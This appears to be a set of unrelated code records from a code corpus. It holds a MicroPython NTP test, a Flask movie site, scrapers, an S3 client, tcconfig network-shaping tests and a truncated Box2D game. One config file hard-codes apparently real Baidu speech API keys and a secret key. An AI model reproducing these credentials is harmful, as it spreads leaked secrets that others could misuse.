try:\n print('Connect to WiFi')\n content = open('config.json').read()\n cfg = json.loads(content)\n except OSError:\n print('Error: Could not load configuration')\n\n rtc = machine.RTC()\n before_ntp = rtc.datetime()\n print('Current Datetime: {}'.format(before_ntp))\n\n sta = WLAN(STA_IF)\n sta.active(True)\n\n nets = sta.scan()\n for net in nets:\n ssid = net[0].decode('UTF-8')\n if ssid == cfg['ssid']:\n sta.connect(ssid, cfg['password'])\n while not sta.isconnected():\n machine.idle()\n break\n break\n else:\n print('Error: Network not found')\n\n print('Connect to NTP Server')\n retry = 0\n while (retry != 5):\n try:\n ntptime.settime()\n break\n except OSError as exc:\n if exc.args[0] == errno.ETIMEDOUT:\n retry += 1\n machine.idle()\n else:\n raise RuntimeError('Could not set ntptime')\n\n rtc = machine.RTC()\n after_ntp = rtc.datetime()\n print('Current Datetime: {}'.format(after_ntp))\n\nif __name__ == \"__main__\":\n test()", "sub_path": "tests/test_time_ntp.py", "file_name": "test_time_ntp.py", "file_ext": "py", "file_size_in_byte": 1316, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "ujson.loads", "line_number": 12, "usage_type": "call"}, {"api_name": "machine.RTC", "line_number": 16, "usage_type": "call"}, {"api_name": "network.WLAN", "line_number": 20, "usage_type": "call"}, {"api_name": 
"network.STA_IF", "line_number": 20, "usage_type": "argument"}, {"api_name": "machine.idle", "line_number": 29, "usage_type": "call"}, {"api_name": "ntptime.settime", "line_number": 39, "usage_type": "call"}, {"api_name": "machine.idle", "line_number": 44, "usage_type": "call"}, {"api_name": "machine.RTC", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "584817824", "text": "from flask import Flask,render_template,request,url_for,redirect\nfrom flask_nav import Nav,register_renderer\nfrom flask_bootstrap.nav import BootstrapRenderer\nfrom flask_nav.elements import *\nfrom flask_bootstrap import Bootstrap\nfrom flask_frozen import Freezer\nimport database\n\n\nlFtrCols = [\"title\",\"year\", \"runtimes\",\"genres\", 'color_info', 'director', 'cast_1st',\n 'cast_2nd', 'cast_3rd', 'countries', 'languages', 'writer',\n 'editor', 'cinematographer', 'art_director', 'costume_designer',\n 'original_music', 'sound_mix', 'production_companies']\n\ninfo_name={'title':'Title','genres':'Genres','color_info':'Color','director':'Director','cast_1st':'1st Actor(Actress)','cast_2nd':'2nd Actor(Actress)','cast_3rd':'3rd Actor(Actress)','countries':'Country','languages':'Language',\n'writer':'Writer','editor':'Editor','cinematographer':'Cinematographer','art_director':'Art Direction','costume_designer':'Costume Designer','original_music':'Original music by','sound_mix':'Sound Mix',\n'production_companies':'Production Company','cheby':'Chebyshev','clark':'Clark','cbra':'Canberra','k-l':'Kullback-Leibler','cos':'Cosine','intsc':'Intersection'}\n\nindices=['cheby','clark','cbra','k-l','cos','intsc']\n\n\nclass CustomRenderer(BootstrapRenderer):\n def visit_Navbar(self, node):\n nav_tag = super(CustomRenderer, self).visit_Navbar(node)\n nav_tag['class'] += ' navbar-fixed-top'\n return nav_tag\n\nnav=Nav()\n\nnav.register_element('top', Navbar(\n # Link('Tech Support', href='http://techsupport.invalid/widgits_inc')\n # ,\n \"Movie Rating Project\",\n View('Index', 'preview')\n))\n\napp = Flask(__name__)\napp.config['FREEZER_RELATIVE_URLS'] = True\nregister_renderer(app, 'custom', CustomRenderer)\n\nnav.init_app(app)\n\nBootstrap(app)\n\nfreezer = Freezer(app)\n\n\n@freezer.register_generator\ndef details():\n for m in database.select_movie():\n yield {'movieid': m[0].encode('utf-8')}\n\n# @app.route('/')\n# def home():\n# movies=database.select_movie()\n# return render_template('index_layout.html',movies=movies)\n # return redirect(url_for('preview'))\n\n@app.route('/preview/')\ndef preview():\n movies=database.select_movie()\n return render_template('index_layout.html',movies=movies)\n\n@app.route('/details//')\ndef details(movieid):\n movie=database.get_instance_details(movieid)\n return render_template('details_layout.html',info_cols=lFtrCols,movie=movie,name=info_name,metrics=indices)\n\n\nif __name__ == '__main__':\n freezer.freeze()\n # freezer.run(debug=True)\n \t# \tapp.run()", "sub_path": "website/index.py", "file_name": "index.py", "file_ext": "py", "file_size_in_byte": 2578, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask_bootstrap.nav.BootstrapRenderer", "line_number": 22, "usage_type": "name"}, {"api_name": "flask_nav.Nav", "line_number": 28, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 37, "usage_type": "call"}, {"api_name": "flask_nav.register_renderer", "line_number": 39, "usage_type": "call"}, {"api_name": "flask_bootstrap.Bootstrap", "line_number": 43, "usage_type": "call"}, {"api_name": 
"flask_frozen.Freezer", "line_number": 45, "usage_type": "call"}, {"api_name": "database.select_movie", "line_number": 50, "usage_type": "call"}, {"api_name": "database.select_movie", "line_number": 61, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 62, "usage_type": "call"}, {"api_name": "database.get_instance_details", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "307943242", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:Zhangcl\nimport logging\nimport time\nfrom logging import handlers\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nfh = handlers.TimedRotatingFileHandler(filename='timelog.log',when='S',interval=2,backupCount=4)\nfh.setLevel(logging.INFO)\nformatter=logging.Formatter('%(asctime)s - %(name)s - %(filename)s %(levelname)s : %(message)s')\nfh.setFormatter(formatter)\nch.setFormatter(formatter)\nlogger.addHandler(ch)\nlogger.addHandler(fh)\nlogger.info('this is info')\nlogger.warning('this is warning')\ntime.sleep(2)\nlogger.error('this is error')\nlogger.info('this is info2')\ntime.sleep(2)\nlogger.warning('this is warning2')", "sub_path": "day6/logtest.py", "file_name": "logtest.py", "file_ext": "py", "file_size_in_byte": 745, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 8, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 9, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 10, "usage_type": "attribute"}, {"api_name": "logging.handlers.TimedRotatingFileHandler", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.handlers", "line_number": 11, "usage_type": "name"}, {"api_name": "logging.INFO", "line_number": 12, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 13, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 20, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "103374616", "text": "import os\nimport glob\nimport requests\nimport json\nfrom core.storages import BaseStorageClient\nfrom core.automan_client import AutomanClient\n\n\nclass S3StorageClient(BaseStorageClient):\n\n def __init__(self, storage_config):\n super(S3StorageClient, self).__init__(storage_config)\n os.mkdir('/s3')\n self.rosbag_path = '/s3/rosbag.bag'\n self.extract_path = storage_config['output_dir']\n self.target_url = storage_config['target_url']\n self.storage_id = storage_config['storage_id']\n\n def download(self, url=None):\n if url is None:\n url = self.target_url\n req = requests.get(url, stream=True)\n if req.status_code == 200:\n with open(self.rosbag_path, 'wb') as f:\n f.write(req.content)\n else:\n print('status_code = ' + str(req.status_code))\n\n def upload(self, automan_info):\n jpg = glob.glob(self.extract_path+'*.jpg')\n pcd = glob.glob(self.extract_path+'*.pcd')\n for filepath in jpg + pcd:\n name = os.path.split(filepath)[1]\n data = {\n 'storage_id': str(self.storage_id),\n 'key': self.extract_path + name}\n res = AutomanClient.send_result(\n automan_info, data, automan_info['presigned']).text\n presigned = json.loads(res)\n headers = {'content-type': 'application/octet-stream'}\n res = requests.put(\n presigned['url'],\n 
headers=headers,\n data=open(filepath, 'rb')\n )\n if res.status_code != 204:\n print('status_code=' + str(res.status_code) + ': ' + res.text)\n\n def list(self):\n pass\n\n def get_input_path(self):\n return self.rosbag_path\n\n def get_output_dir(self):\n return self.extract_path\n", "sub_path": "libs/core/storages/s3_storage_client.py", "file_name": "s3_storage_client.py", "file_ext": "py", "file_size_in_byte": 1885, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "core.storages.BaseStorageClient", "line_number": 9, "usage_type": "name"}, {"api_name": "os.mkdir", "line_number": 13, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 22, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 30, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "core.automan_client.AutomanClient.send_result", "line_number": 37, "usage_type": "call"}, {"api_name": "core.automan_client.AutomanClient", "line_number": 37, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 39, "usage_type": "call"}, {"api_name": "requests.put", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "517957445", "text": "from selenium import webdriver\nfrom bs4 import BeautifulSoup\n\nimport numpy as np\nimport pandas as pd\nimport re\nimport time\n\nclass HKJCRaceResult:\n \"\"\" Load a HKJC race result webpage and extract informations\n 1. Race tab\n 2. Performance\n 3. Result\n \"\"\"\n def __init__(self, browser_path):\n \"\"\" initiate a browser\n\n Parameters: browser_path (str) - the browser_path, recommend to use firefox\n \"\"\"\n self.browser = webdriver.Firefox(executable_path=browser_path)\n\n def load_race_source(self, year, month, day, race_num, quit_session=False):\n \"\"\" load the specific race result\n\n Parameters: year (str) - year\n month (str) - month\n day (str) - day\n race_num (str) - the race number\n quit_session (boo) - quit this session or not, optional, default is False\n \"\"\"\n url = 'https://racing.hkjc.com/racing/information/English/Racing/LocalResults.aspx?RaceDate={}/{}/{}&RaceNo={}'.format(year, month, day, race_num)\n\n self.browser.get(url)\n\n counter = 0\n while True:\n counter += 1\n time.sleep(5)\n self.soup = BeautifulSoup(self.browser.page_source, 'html.parser')\n check_if_load = self.soup.find_all('div', class_='localResults commContent')\n\n if check_if_load:\n break\n elif counter == 5:\n print('Failed to load expected page source')\n break\n else:\n continue\n\n if quit_session:\n self.close_browser()\n\n def extract_race_tab(self):\n \"\"\" extract race tab\n \"\"\"\n # race tab\n race_tab = self.soup.find_all('div', class_='race_tab')[0]\n rt_table = race_tab.find_all('table')[0].find_all('td')\n rt_info = [i.text for i in rt_table if i.text != '']\n\n return rt_info\n\n def extract_race_performance(self):\n \"\"\" extract race performance\n \"\"\"\n # performance\n performance = self.soup.find_all('div', class_='performance')[0]\n # table header\n p_table_header = [i.text for i in performance.find_all('thead')[0].find_all('td')]\n # table content\n p_table = performance.find_all('table')[0].find_all('tbody')[0].find_all('td')\n # reshape dimension\n p_table_arr = np.array([re.sub(r'\\s+', ' ', i.text) for i in p_table]).reshape((-1,len(p_table_header)))\n 
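The load_race_source method above re-parses browser.page_source every five seconds until the 'localResults commContent' container shows up, giving up after five rounds. The same wait-and-check pattern as a reusable helper (the driver object and CSS class are whatever the caller supplies):

import time
from bs4 import BeautifulSoup

def wait_for_class(browser, css_class, attempts=5, delay=5):
    # Poll the rendered page until a div with css_class appears, or give up.
    for _ in range(attempts):
        time.sleep(delay)
        soup = BeautifulSoup(browser.page_source, 'html.parser')
        if soup.find_all('div', class_=css_class):
            return soup
    raise RuntimeError('expected element never appeared: %s' % css_class)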
performance_info = pd.DataFrame(p_table_arr, columns=p_table_header)\n\n return performance_info\n\n def extract_race_result(self):\n \"\"\" extract race result\n \"\"\"\n # result\n result = self.soup.find_all('div', class_='dividend_tab f_clear')[0].find_all('table')[0]\n # table header\n result_header = [i.text for i in result.find_all('thead')[0].find_all('tr', class_='bg_e6caae')[0].find_all('td')]\n # table content\n result_tr = result.find_all('tbody')[0].find_all('tr')\n # process table content\n max_td = np.max([len(i.find_all('td')) for i in result_tr])\n all_tr = list()\n\n # pad length not max\n for j in result_tr:\n sec_len = len(j.find_all('td'))\n if sec_len < max_td:\n this_sec = [all_tr[-1][0]]*(max_td-sec_len) + [i.text for i in j.find_all('td')]\n else:\n this_sec = [i.text for i in j.find_all('td')]\n all_tr.append(this_sec)\n\n result_info = pd.DataFrame(all_tr, columns=result_header)\n\n return result_info\n\n def close_browser(self):\n \"\"\" close the current session\n \"\"\"\n self.browser.close()\n", "sub_path": "ETL/coolorange/scraper.py", "file_name": "scraper.py", "file_ext": "py", "file_size_in_byte": 3703, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "selenium.webdriver.Firefox", "line_number": 20, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 20, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 73, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 88, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 100, "usage_type": "call"}]} +{"seq_id": "208169557", "text": "\nfrom pymongo import MongoClient\nfrom aip import AipSpeech\n\nMC = MongoClient(\"127.0.0.1\", 27017)\nMongoDB = MC[\"Teresa\"]\nCOVER_PATH = 'Cover'\nMUSIC_PATH = 'Music'\nCHAT_PATH = 'Chat'\nQR_PATH = 'QR code'\nLT_URL = \"http://qr.liantu.com/api.php?text=\"\n\nAPP_ID = '16981699'\nAPI_KEY = '36Lnn4w8Yov91xN1B0RXzk8Y'\nSECRET_KEY = 'fVqFeNIUKSLO6STTCqeHip8DYMtBvtPz'\nAUDIO_CLIENT = AipSpeech(APP_ID, API_KEY, SECRET_KEY)\nVOICE = {'vol': 5}\n\nRET = {\n 'CODE': 0,\n 'MSG': '',\n 'DATA': {}\n}", "sub_path": "玩具项目/人工智能03/Bronya/Config.py", "file_name": "Config.py", "file_ext": "py", "file_size_in_byte": 481, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pymongo.MongoClient", "line_number": 5, "usage_type": "call"}, {"api_name": "aip.AipSpeech", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "6855791", "text": "from selenium import webdriver\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\ndriver = webdriver.Chrome(\"C:/Users/Lenovo/Downloads/chromedriver_win32/chromedriver\")\r\nproducts=[]\r\nprices=[]\r\ndriver.get(\"https://www.goibibo.com/hotels/find-hotels-in-Hubli/4175146706007535451/4175146706007535451/%7B%22ci%22:%2220200407%22,%22co%22:%2220200408%22,%22r%22:%221-2-0%22%7D/?{%22filter%22:{}}&sec=dom\")\r\ncontent = driver.page_source\r\nsoup = BeautifulSoup(content)\r\nfor a in soup.findAll('div', attrs={'class':'Layouts__Column-sc-1yzlivq-1 HotelCardstyles__HeadingInfoWrapperDiv-sc-1s80tyk-8 kRLydM'}):\r\n name=a.find('div', 
attrs={'class':'HotelCardstyles__HotelNameWrapperDiv-sc-1s80tyk-13 jbBSpQ'})\r\n #price=a.find('div', attrs={'class':'latoBlack font26 blackText appendBottom5'})\r\n products.append(name.text)\r\n #prices.append(price.text)\r\nfor a in soup.findAll('div', attrs={'class':'HotelCardstyles__PriceInfoWrapperDiv-sc-1s80tyk-28 hONQHN'}):\r\n #name=a.find('div', attrs={'class':'latoBlack font22 blackText appendBottom12'})\r\n price=a.find('span', attrs={'class':'HotelCardstyles__CurrentPrice-sc-1s80tyk-32 cPOgJy'})\r\n #products.append(name.text)\r\n prices.append(price.text)\r\ndf = pd.DataFrame({'Hotel Name':products,'Price':prices}) \r\ndf.to_csv('Hotels.csv', index=False, encoding='utf-8')", "sub_path": "web.py", "file_name": "web.py", "file_ext": "py", "file_size_in_byte": 1322, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 4, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 4, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 9, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "396933970", "text": "# encoding: utf-8\n\n'''\n@author: Tsuyoshi Hombashi\n'''\n\nimport itertools\nimport platform\n\nimport dataproperty\nimport pingparsing\nimport pytest\nimport six\nimport thutils\nimport tcconfig\n\n\nDEVICE = \"eth0\"\nWAIT_TIME = 5 # [sec]\n\n\n@pytest.fixture\ndef dst_host_option(request):\n return request.config.getoption(\"--dst-host\")\n\n\n@pytest.fixture\ndef dst_host_ex_option(request):\n return request.config.getoption(\"--dst-host-ex\")\n\n\n@pytest.fixture\ndef subproc_wrapper():\n return thutils.subprocwrapper.SubprocessWrapper()\n\n\n@pytest.fixture\ndef pingparser():\n return pingparsing.PingParsing()\n\n\n@pytest.fixture\ndef transmitter():\n transmitter = pingparsing.PingTransmitter()\n transmitter.ping_option = \"-f -q\"\n transmitter.waittime = WAIT_TIME\n\n return transmitter\n\n\nclass NormalTestValue:\n RATE_LIST = [\n \"\",\n \"--rate 100K\",\n \"--rate 0.5M\",\n ]\n DELAY_LIST = [\n \"\",\n \"--delay 100\",\n ]\n DELAY_DISTRO_LIST = [\n \"\",\n \"--delay-distro 20\",\n ]\n PACKET_LOSS_RATE_LIST = [\n \"\",\n \"--loss 0.1\",\n ]\n CORRUPTION_RATE_LIST = [\n \"\",\n \"--corrupt 0.1\",\n ]\n DIRECTION_LIST = [\n \"\",\n \"--direction outgoing\",\n \"--direction incoming\",\n ]\n NETWORK_LIST = [\n \"\",\n \"--network 192.168.0.10\",\n \"--network 192.168.0.0/24\",\n ]\n PORT_LIST = [\n \"\",\n \"--port 80\",\n ]\n OVERWRITE_LIST = [\n \"\",\n \"--overwrite\",\n ]\n\n\nclass Test_tcconfig:\n \"\"\"\n Tests of in this class are inappropriate for Travis CI.\n Execute following command at the local environment when running tests:\n python setup.py test --addopts --runxfail\n\n These tests are expected to execute on following environment:\n - Linux(debian) w/ iputils-ping package\n - English environment (for parsing ping output)\n \"\"\"\n\n @pytest.mark.xfail\n @pytest.mark.parametrize(\n [\n \"rate\", \"delay\", \"delay_distro\", \"loss\", \"corrupt\",\n \"direction\", \"network\", \"port\", \"overwrite\",\n ],\n [\n opt_list\n for opt_list in itertools.product(\n NormalTestValue.RATE_LIST,\n NormalTestValue.DELAY_LIST,\n NormalTestValue.DELAY_DISTRO_LIST,\n NormalTestValue.PACKET_LOSS_RATE_LIST,\n NormalTestValue.CORRUPTION_RATE_LIST,\n NormalTestValue.DIRECTION_LIST,\n NormalTestValue.NETWORK_LIST,\n NormalTestValue.PORT_LIST,\n 
NormalTestValue.OVERWRITE_LIST)\n ])\n def test_smoke(\n self, subproc_wrapper, rate, delay, delay_distro, loss, corrupt,\n direction, network, port, overwrite):\n command = \" \".join([\n \"tcset\",\n \"--device \" + DEVICE,\n rate, delay, delay_distro, loss,\n direction, network, port, overwrite,\n ])\n assert subproc_wrapper.run(command) == 0\n\n assert subproc_wrapper.run(\"tcdel --device \" + DEVICE) == 0\n\n @pytest.mark.xfail\n @pytest.mark.parametrize([\"overwrite\", \"expected\"], [\n [\"\", 0],\n [\"--overwrite\", 255],\n ])\n def test_config_file(self, tmpdir, subproc_wrapper, overwrite, expected):\n p = tmpdir.join(\"tcconfig.json\")\n config = \"\"\"{\n \"eth0\": {\n \"outgoing\": {\n \"network=192.168.0.10/32, port=8080\": {\n \"delay\": \"10.0\", \n \"loss\": \"0.01\", \n \"rate\": \"250K\", \n \"delay-distro\": \"2.0\"\n }, \n \"network=0.0.0.0/0\": {}\n }, \n \"incoming\": {\n \"network=192.168.10.0/24\": {\n \"corrupt\": \"0.02\", \n \"rate\": \"1500K\"\n }, \n \"network=0.0.0.0/0\": {}\n }\n }\n}\n\"\"\"\n p.write(config)\n\n subproc_wrapper.run(\"tcdel --device \" + DEVICE)\n command = \" \".join([\"tcset -f \", str(p), overwrite])\n assert subproc_wrapper.run(command) == expected\n\n proc = subproc_wrapper.popen_command(\"tcshow --device \" + DEVICE)\n tcshow_stdout, _stderr = proc.communicate()\n assert thutils.loader.JsonLoader.loads(\n tcshow_stdout) == thutils.loader.JsonLoader.loads(config)\n\n assert subproc_wrapper.run(\"tcdel --device \" + DEVICE) == 0\n\n\nclass Test_tcset_one_network:\n \"\"\"\n Tests of in this class are inappropriate for Travis CI.\n Execute following command at the local environment when running tests:\n python setup.py test --addopts \"--dst-host=\"\n\n These tests are expected to execute on following environment:\n - Linux(debian) w/ iputils-ping package\n - English environment (for parsing ping output)\n \"\"\"\n\n @pytest.mark.parametrize([\"delay\"], [\n [100],\n ])\n def test_const_latency(\n self, dst_host_option, subproc_wrapper,\n transmitter, pingparser, delay):\n if dataproperty.is_empty_string(dst_host_option):\n # alternative to pytest.mark.skipif\n return\n\n subproc_wrapper.run(\"tcdel --device \" + DEVICE)\n transmitter.destination_host = dst_host_option\n\n # w/o latency tc ---\n result = transmitter.ping()\n pingparser.parse(result)\n without_tc_rtt_avg = pingparser.rtt_avg\n\n # w/ latency tc ---\n command_list = [\n \"tcset\",\n \"--device \" + DEVICE,\n \"--delay %d\" % (delay),\n ]\n assert subproc_wrapper.run(\" \".join(command_list)) == 0\n\n result = transmitter.ping()\n pingparser.parse(result)\n with_tc_rtt_avg = pingparser.rtt_avg\n\n # assertion ---\n rtt_diff = with_tc_rtt_avg - without_tc_rtt_avg\n assert rtt_diff > (delay / 2.0)\n\n # finalize ---\n assert subproc_wrapper.run(\"tcdel --device \" + DEVICE) == 0\n\n @pytest.mark.skipif(\"platform.system() == 'Windows'\")\n @pytest.mark.parametrize([\"delay\", \"delay_distro\"], [\n [100, 50],\n ])\n def test_const_latency_distro(\n self, dst_host_option, subproc_wrapper,\n transmitter, pingparser, delay, delay_distro):\n if dataproperty.is_empty_string(dst_host_option):\n # alternative to pytest.mark.skipif\n return\n\n subproc_wrapper.run(\"tcdel --device \" + DEVICE)\n transmitter.destination_host = dst_host_option\n\n # w/o latency tc ---\n result = transmitter.ping()\n pingparser.parse(result)\n without_tc_rtt_avg = pingparser.rtt_avg\n without_tc_rtt_mdev = pingparser.rtt_mdev\n\n # w/ latency tc ---\n command_list = [\n \"tcset\",\n \"--device \" + 
DEVICE,\n \"--delay %d\" % (delay),\n \"--delay-distro %d\" % (delay_distro),\n ]\n assert subproc_wrapper.run(\" \".join(command_list)) == 0\n\n result = transmitter.ping()\n pingparser.parse(result)\n with_tc_rtt_avg = pingparser.rtt_avg\n with_tc_rtt_mdev = pingparser.rtt_mdev\n\n # assertion ---\n rtt_diff = with_tc_rtt_avg - without_tc_rtt_avg\n assert rtt_diff > (delay / 2.0)\n\n rtt_diff = with_tc_rtt_mdev - without_tc_rtt_mdev\n assert rtt_diff > (delay_distro / 2.0)\n\n # finalize ---\n subproc_wrapper.run(\"tcdel --device \" + DEVICE)\n\n @pytest.mark.parametrize([\"option\", \"value\"], [\n [\"--loss\", 10],\n [\"--corrupt\", 10],\n ])\n def test_const_packet_loss(\n self, dst_host_option, subproc_wrapper,\n transmitter, pingparser, option, value):\n if dataproperty.is_empty_string(dst_host_option):\n # alternative to pytest.mark.skipif\n return\n\n subproc_wrapper.run(\"tcdel --device \" + DEVICE)\n transmitter.destination_host = dst_host_option\n\n # w/o packet loss tc ---\n result = transmitter.ping()\n pingparser.parse(result)\n without_tc_loss = (\n pingparser.packet_receive / float(pingparser.packet_transmit)) * 100.0\n\n # w/ packet loss tc ---\n command_list = [\n \"tcset\",\n \"--device \" + DEVICE,\n \"%s %f\" % (option, value),\n ]\n assert subproc_wrapper.run(\" \".join(command_list)) == 0\n\n result = transmitter.ping()\n pingparser.parse(result)\n with_tc_loss = (\n pingparser.packet_receive / float(pingparser.packet_transmit)) * 100.0\n\n # assertion ---\n loss_diff = without_tc_loss - with_tc_loss\n assert loss_diff > (value / 2.0)\n\n # finalize ---\n subproc_wrapper.run(\"tcdel --device \" + DEVICE)\n\n\nclass Test_tcset_two_network:\n \"\"\"\n Tests of in this class are inappropriate for Travis CI.\n Execute following command at the local environment when running tests:\n python setup.py test --addopts \\\n \"--dst-host= --dst-host-ex=\"\n\n These tests are expected to execute on following environment:\n - Linux(debian) w/ iputils-ping package\n - English environment (for parsing ping output)\n \"\"\"\n\n def test_network(\n self, dst_host_option, dst_host_ex_option, subproc_wrapper,\n transmitter, pingparser):\n if any([\n dataproperty.is_empty_string(dst_host_option),\n dataproperty.is_empty_string(dst_host_ex_option),\n ]):\n # alternative to pytest.mark.skipif\n return\n\n subproc_wrapper.run(\"tcdel --device \" + DEVICE)\n delay = 100\n\n # tc to specific network ---\n command_list = [\n \"tcset\",\n \"--device \" + DEVICE,\n \"--delay %d\" % (delay),\n \"--network \" + dst_host_ex_option,\n ]\n assert subproc_wrapper.run(\" \".join(command_list)) == 0\n\n # w/o tc network ---\n transmitter.destination_host = dst_host_option\n result = transmitter.ping()\n pingparser.parse(result)\n without_tc_rtt_avg = pingparser.rtt_avg\n\n # w/ tc network ---\n transmitter.destination_host = dst_host_ex_option\n result = transmitter.ping()\n pingparser.parse(result)\n with_tc_rtt_avg = pingparser.rtt_avg\n\n # assertion ---\n rtt_diff = with_tc_rtt_avg - without_tc_rtt_avg\n assert rtt_diff > (delay / 2.0)\n\n # finalize ---\n subproc_wrapper.run(\"tcdel --device \" + DEVICE)\n", "sub_path": "test/test_tcconfig.py", "file_name": "test_tcconfig.py", "file_ext": "py", "file_size_in_byte": 10436, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pytest.fixture", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 27, "usage_type": "attribute"}, {"api_name": 
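Every latency test in test/test_tcconfig.py above follows one recipe: measure the average RTT, apply a tcset rule, measure again, and require the difference to clear half the configured delay. Condensed into a single helper, reusing the pingparsing calls the fixtures build and shelling out to tcset/tcdel the way the tests do (a sketch, not part of the original suite):

import subprocess
import pingparsing

def avg_rtt(host):
    transmitter = pingparsing.PingTransmitter()
    transmitter.destination_host = host
    parser = pingparsing.PingParsing()
    parser.parse(transmitter.ping())
    return parser.rtt_avg

def assert_delay_applied(host, delay_ms, device='eth0'):
    base = avg_rtt(host)
    subprocess.check_call(['tcset', '--device', device, '--delay', str(delay_ms)])
    try:
        shaped = avg_rtt(host)
    finally:
        subprocess.check_call(['tcdel', '--device', device])
    # Same tolerance the tests assert: at least half the configured delay must show up.
    assert shaped - base > delay_ms / 2.0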
"thutils.subprocwrapper.SubprocessWrapper", "line_number": 34, "usage_type": "call"}, {"api_name": "thutils.subprocwrapper", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pingparsing.PingParsing", "line_number": 39, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pingparsing.PingTransmitter", "line_number": 44, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 104, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 105, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 105, "usage_type": "attribute"}, {"api_name": "itertools.product", "line_number": 112, "usage_type": "call"}, {"api_name": "thutils.loader.JsonLoader.loads", "line_number": 172, "usage_type": "call"}, {"api_name": "thutils.loader", "line_number": 172, "usage_type": "attribute"}, {"api_name": "thutils.loader.JsonLoader.loads", "line_number": 173, "usage_type": "call"}, {"api_name": "thutils.loader", "line_number": 173, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 136, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 137, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 137, "usage_type": "attribute"}, {"api_name": "dataproperty.is_empty_string", "line_number": 195, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 189, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 189, "usage_type": "attribute"}, {"api_name": "dataproperty.is_empty_string", "line_number": 233, "usage_type": "call"}, {"api_name": "pytest.mark.skipif", "line_number": 226, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 226, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 227, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 227, "usage_type": "attribute"}, {"api_name": "dataproperty.is_empty_string", "line_number": 277, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 270, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 270, "usage_type": "attribute"}, {"api_name": "dataproperty.is_empty_string", "line_number": 327, "usage_type": "call"}, {"api_name": "dataproperty.is_empty_string", "line_number": 328, "usage_type": "call"}]} +{"seq_id": "13130822", "text": "# -*- coding: utf-8 -*-\n\nfrom pug2d import core, actions, box2d\nfrom pug2d.box2d import Box2DLevel, Updater, can_see\nfrom Box2D import b2\nimport sf\n\n\nbox2d.PPM = 20\n\nclass Level1(Box2DLevel):\n def __init__(self, world):\n super(Level1, self).__init__(world)\n layer = core.Layer()\n self.add_layer(layer)\n \n self.ground = world.CreateStaticBody(\n position=(0, -2),\n shapes=b2.polygonShape(box=(50, 5))\n )\n \n self.im0 = sf.Texture.load_from_file(b'princess.png')\n for x in range(100, 800, 300):\n sprite = sf.Sprite(self.im0)\n 